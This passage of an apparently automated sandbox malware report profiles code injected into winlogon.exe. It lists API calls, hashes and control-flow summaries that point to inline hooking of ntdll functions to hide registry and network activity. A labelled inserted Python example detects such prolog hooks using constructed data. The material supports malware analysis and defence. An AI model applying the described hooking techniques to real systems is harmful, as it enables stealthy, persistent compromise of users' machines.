                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 5ebfe231e3b5998aca6e229cc949323c5c65e22de211b62673f532ffd030ceb8
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: 25118E2A318B5092EB549BA9E4483697261F748F96F148438DF8E07754EF3DC544C704

                                                                  Control-flow Graph

                                                                  • Graph for the function at 225dc645f60: GetCurrentThreadId at entry; GetThreadContext and SetThreadContext in the middle of the routine; VirtualProtect immediately followed by FlushInstructionCache; ResumeThread before the exit path through 225dc647d70. Other callees: 225dc645d90, 225dc6489f0, 225dc644940, 225dc6448e0, 225dc6448a0, 225dc6478ef, 225dc647cdc, 225dc6447c0, 225dc643d30, 225dc64790d, 225dc643da0, 225dc645220, 225dc644810.
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 2c9875a4be257d71c1bbafe5528e600240430df731cdbb341610095cc3b88c53
                                                                  • Instruction ID: 2e21bb73cee3d71e79c9cd6234793ef84b45f6acac65b4cfa46dbbb6eb0919c0
                                                                  • Opcode Fuzzy Hash: 2c9875a4be257d71c1bbafe5528e600240430df731cdbb341610095cc3b88c53
                                                                  • Instruction Fuzzy Hash: 50D19A7A20CF9896DA70DB8AE49835A77A0F3C8B85F104156EACE47BA5DF7CC541CB00
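The routine above (GetThreadContext / SetThreadContext, VirtualProtect followed by FlushInstructionCache, then ResumeThread) is the shape of an inline hook installer, which matches the report's "Modifies the prolog of user mode functions" signature. The following is an added example, not code from the report or from the sample: it shows the check a responder would run against a live process, diffing the first bytes of an export as mapped from the on-disk image against the bytes read from the process and decoding where a patched prolog transfers control. Every module base, function offset and prolog byte string in it is constructed for the example; only the address 0x225DC642990, the NtEnumerateValueKey handler in the winlogon dump, is taken from the report.

```python
"""Added example, not part of the Joe Sandbox report or of the analysed sample.
Diffs x64 function prologs (disk image vs. live process) and decodes the detour
a patched prolog takes. All addresses and byte strings are constructed."""
import struct
from dataclasses import dataclass
from typing import Optional

MASK64 = (1 << 64) - 1
PROLOG_LEN = 16          # bytes compared per function; covers the 14-byte patches


@dataclass
class Detour:
    kind: str            # which patch pattern matched
    target: int          # absolute address control is transferred to
    patch_len: int       # prolog bytes the hook overwrote


def decode_detour(mem: bytes, func_va: int) -> Optional[Detour]:
    """Recognise the prolog patches hook engines commonly emit on x64.
    func_va is the function's virtual address in the live process."""
    if len(mem) < PROLOG_LEN:
        raise ValueError("need at least %d prolog bytes" % PROLOG_LEN)
    # E9 rel32: target is relative to the end of the 5-byte instruction
    if mem[0] == 0xE9:
        rel = struct.unpack_from("<i", mem, 1)[0]
        return Detour("jmp rel32", (func_va + 5 + rel) & MASK64, 5)
    # FF 25 00000000 + imm64: jmp [rip+0] with the 8-byte target inline (14 bytes)
    if mem[:6] == b"\xff\x25\x00\x00\x00\x00":
        return Detour("jmp [rip+0]; dq target", struct.unpack_from("<Q", mem, 6)[0], 14)
    # 48 B8 imm64 ; FF E0: mov rax, imm64 ; jmp rax (12 bytes)
    if mem[:2] == b"\x48\xb8" and mem[10:12] == b"\xff\xe0":
        return Detour("mov rax,imm64; jmp rax", struct.unpack_from("<Q", mem, 2)[0], 12)
    # 68 lo32 ; C7 44 24 04 hi32 ; C3: push lo ; mov dword [rsp+4],hi ; ret (14 bytes)
    if mem[0] == 0x68 and mem[5:9] == b"\xc7\x44\x24\x04" and mem[13] == 0xC3:
        lo = struct.unpack_from("<I", mem, 1)[0]
        hi = struct.unpack_from("<I", mem, 9)[0]
        return Detour("push/mov/ret", (hi << 32) | lo, 14)
    return None


def check_prolog(name: str, disk: bytes, mem: bytes, func_va: int,
                 module_lo: int, module_hi: int) -> dict:
    """Compare disk vs. live prolog bytes. hooked is True whenever they differ;
    target_outside_module says whether the detour leaves the module, the usual
    signature of a third-party hook. Caveat: some security products and OS
    hot-patching also rewrite prologs, so a hit is a triage lead, not a verdict."""
    if disk[:PROLOG_LEN] == mem[:PROLOG_LEN]:
        return {"function": name, "hooked": False, "pattern": None,
                "target": None, "target_outside_module": False}
    d = decode_detour(mem, func_va)
    if d is None:        # modified, but not a pattern we decode: still report it
        return {"function": name, "hooked": True, "pattern": "unknown",
                "target": None, "target_outside_module": None}
    return {"function": name, "hooked": True, "pattern": d.kind,
            "target": d.target,
            "target_outside_module": not (module_lo <= d.target < module_hi)}


# --- constructed data: a fake ntdll mapping with three syscall-stub exports ---
NTDLL_BASE = 0x7FFA12340000        # assumed module base
NTDLL_SIZE = 0x1F0000              # assumed image size
CLEAN_STUB = bytes.fromhex("4c8bd1b813000000f604250803fe7f01")  # stub-like bytes
FUNCS = {                          # assumed export addresses
    "NtEnumerateValueKey": NTDLL_BASE + 0x9D0E0,
    "NtQuerySystemInformation": NTDLL_BASE + 0x9D5A0,
    "NtCreateFile": NTDLL_BASE + 0x9D3C0,
}


def jmp_rel32(func_va: int, target: int) -> bytes:
    """Emit 'E9 rel32' the way a hook engine would, NOP-padded to PROLOG_LEN."""
    rel = target - (func_va + 5)
    if not -2**31 <= rel < 2**31:
        raise ValueError("target not reachable with rel32")
    return b"\xe9" + struct.pack("<i", rel) + b"\x90" * (PROLOG_LEN - 5)


def jmp_abs14(target: int) -> bytes:
    """Emit the 14-byte absolute jump used when the target is more than 2 GiB away."""
    return b"\xff\x25\x00\x00\x00\x00" + struct.pack("<Q", target) + b"\x90" * (PROLOG_LEN - 14)


LIVE = {   # what reading the live process would return under the hooks
    "NtEnumerateValueKey": jmp_abs14(0x225DC642990),                 # into the injected module
    "NtQuerySystemInformation": jmp_rel32(FUNCS["NtQuerySystemInformation"],
                                          NTDLL_BASE + 0x1A0000),    # short hop inside ntdll
    "NtCreateFile": CLEAN_STUB,                                      # untouched
}


def scan() -> dict:
    """Run the check over every constructed export; result keyed by function name."""
    return {n: check_prolog(n, CLEAN_STUB, LIVE[n], va, NTDLL_BASE, NTDLL_BASE + NTDLL_SIZE)
            for n, va in FUNCS.items()}


if __name__ == "__main__":
    for report in scan().values():
        print(report)
```

In practice the disk side comes from mapping the same ntdll.dll that the process loaded and applying its section layout, and the live side from ReadProcessMemory at the export's address; a target that resolves into a module the loader list does not know about, as with the 225dc640000 region in winlogon here, is the strongest signal.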

                                                                  Control-flow Graph

                                                                  • Graph for the function at 225dc645500: GetCurrentThreadId near the entry, VirtualProtect late in the routine with GetLastError on one of the two branches that follow it. Callees: 225dc645b10 (twice), 225dc647ca0, 225dc6447c0, 225dc647cdc, 225dc6440f0, 225dc649090, 225dc647870, 225dc644490, 225dc6449c0, 225dc6489f0, 225dc644940, 225dc6448a0.
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 0484fdcd3f842ffe2eb8cf6abe3111b51bf2a7d82943804f644aff27e1a59f59
                                                                  • Instruction ID: 497ad16e15aeee416df0bddaacebb39c200c4c2ee8fa882154d46654e74b9134
                                                                  • Opcode Fuzzy Hash: 0484fdcd3f842ffe2eb8cf6abe3111b51bf2a7d82943804f644aff27e1a59f59
                                                                  • Instruction Fuzzy Hash: FB02E93621DF9496EBA0CB99E49835AB7A1F3C5795F104056EA8E87BA8DF7CC444CB00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 3316853933-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: 0526b13a4640494a154737fd18b208aeadbfaa7a845f4f4111ac3a2fd46cdc36
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: 9091487AB02A6097EF66CF69D008B6DB3A1F754B9BF54C125DF0A47788DA38D852C700

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocQuery
                                                                  • String ID:
                                                                  • API String ID: 31662377-0
• Opcode ID: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
• Instruction ID: c8307eed51a542c14115f8f3d212823eb754a030e29d743a42d646e143d38ee7
• Opcode Fuzzy Hash: dece628dfa6b96fb4fa24b2af5206c26f3a407fbee04769110ae8374df39886d
• Instruction Fuzzy Hash: A131212521DE98D1EA70DB9DE05835AB2A0F388B85F108575F6CF46BA8DF7DC581CB00

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32 ref: 00000225DC643639
• PathFindFileNameW.SHLWAPI ref: 00000225DC643648
  • Part of subcall function 00000225DC643C74: StrCmpNIW.SHLWAPI(?,?,?,00000225DC64254B), ref: 00000225DC643C8C
  • Part of subcall function 00000225DC643BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643BCE
  • Part of subcall function 00000225DC643BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643BFC
  • Part of subcall function 00000225DC643BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643C1E
  • Part of subcall function 00000225DC643BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643C39
  • Part of subcall function 00000225DC643BC0: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC64365F), ref: 00000225DC643C5A
• CreateThread.KERNELBASE ref: 00000225DC64368F
  • Part of subcall function 00000225DC641D40: GetCurrentThread.KERNEL32 ref: 00000225DC641D4B
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
• Instruction ID: cb6c25e1d175d1ab828ac87d865260820c1993d6885dbca23a44a31068f7e984
• Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
• Instruction Fuzzy Hash: FE11757862CE3662FB60ABECE50D3593291B755B57F50C1B59607856D5EF7CC048CA00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: CacheCurrentFlushInstructionProcessProtectVirtual
• String ID:
• API String ID: 3733156554-0
• Opcode ID: 3cd42903cdcc5958fd6b3f80d03c4f8cc262e2c27ec8a819bb88f8b744014d6b
• Instruction ID: aabe0a8065b1290ac19efed51260d016298b09264276fd75c2282f6936c50693
• Opcode Fuzzy Hash: 3cd42903cdcc5958fd6b3f80d03c4f8cc262e2c27ec8a819bb88f8b744014d6b
• Instruction Fuzzy Hash: 5CF0173A61CE2490D670AB89E44934A77A0E3887D5F148152BA8E43B69DB38C280CF00

Control-flow Graph

APIs
  • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
  • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416B2
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416DF
  • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641719
  • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC641734
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641754
  • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64178F
  • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417CA
• SleepEx.KERNELBASE ref: 00000225DC641AE3
  • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641805
  • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641840
  • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
  • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64187B
  • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
  • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC6418A0
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: CloseOpen$Heap$AllocProcessSleep
• String ID:
• API String ID: 948135145-0
• Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
• Instruction ID: 76bb7eedacbd5859dbe052eab2fde45565dd295a6020b4ef6d0efc5088b35558
• Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
• Instruction Fuzzy Hash: FE312B5971CE21B3FB549BAED55839A33A4AB84BC6F04D0A19E0BC77E5EF34C450C250

Control-flow Graph

Control-flow graph edge list (rendered graph omitted): control_flow_graph 317 225dc67dafc-225dc67db0b 318 225dc67db0d-225dc67db19 317->318 319 225dc67db1b-225dc67db2b 317->319 318->319 320 225dc67db5e-225dc67db69 call 225dc67dadc 318->320 321 225dc67db42-225dc67db5a HeapAlloc 319->321 326 225dc67db6b-225dc67db70 320->326 322 225dc67db2d-225dc67db34 call 225dc680b50 321->322 323 225dc67db5c 321->323 322->320 329 225dc67db36-225dc67db40 call 225dc67bc8c 322->329 323->326 329->320 329->321
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00000225DC67D432,?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67DB51
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: eccdd21bcd0f5f67a7d4aa425ad47f9ef9ee03f6fd3ee1dab1865530e317391c
• Instruction ID: 910fec881038d3e959c5cbd36d64231f1f330e05cf4666e0bbaa78b85f6841b8
• Opcode Fuzzy Hash: eccdd21bcd0f5f67a7d4aa425ad47f9ef9ee03f6fd3ee1dab1865530e317391c
• Instruction Fuzzy Hash: 3AF0309D301E24A1FE559BED955D3A552949F89F82F4CCC304D0A8BBC2EE3DC4C9C254
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
• Instruction ID: ce62792369046bd4a70554c70a422cbbe4044552d12490b17b477eb1b2c5f5a3
• Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
• Instruction Fuzzy Hash: E3B1B17A210EA0E2EB668FADD5087A9A3A4FB44B86F44D916EE4953BD4DF34CC41C740
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
• Instruction ID: b73a31797632136bb9ee07bd0a057a1df3d581b16511b2f44c226dca76c5927e
• Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
• Instruction Fuzzy Hash: 6CB1A57A21CEA0A1EBA69FEDD408799B3A4F744B86F64D056EE0A53794DF34CC41C340
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
• Instruction ID: f385fca171912b8a282d347bf93c3e0a6e4a279df09b91b5ef974fa9411efd51
• Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
• Instruction Fuzzy Hash: F8314C76204F909AEB608FA4E8543ED7360F788746F84852ADB4E57B99DF38C648C710
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
• Instruction ID: 471f790d7621a760121cfd2544642bdc87453e522d55ac33a6ee3fd36c7b4cc6
• Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
• Instruction Fuzzy Hash: 34316D76218F90DAEB608FA4E8543EE7364F788749F44812ADB4E47B99DF38C648C710
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
• Instruction ID: 49bd029eac69f0a0934ead3ec5209e459d91f2263c268eeeb221ac77c1a5fc9f
• Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
• Instruction Fuzzy Hash: 8B31923A214F9096EB60CFA9E8443DE73A4F788795F504526EB8D47B98DF38C549CB00
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
• Instruction ID: 1ee8b7da3a1ca6efd31af0da14551b6eac32b1645751b8169b469f92989e0ca2
• Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
• Instruction Fuzzy Hash: 6B31863A218F9096DB60DFA9E8443DE73A4F789795F504116EB9E43B98DF38C145CB00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
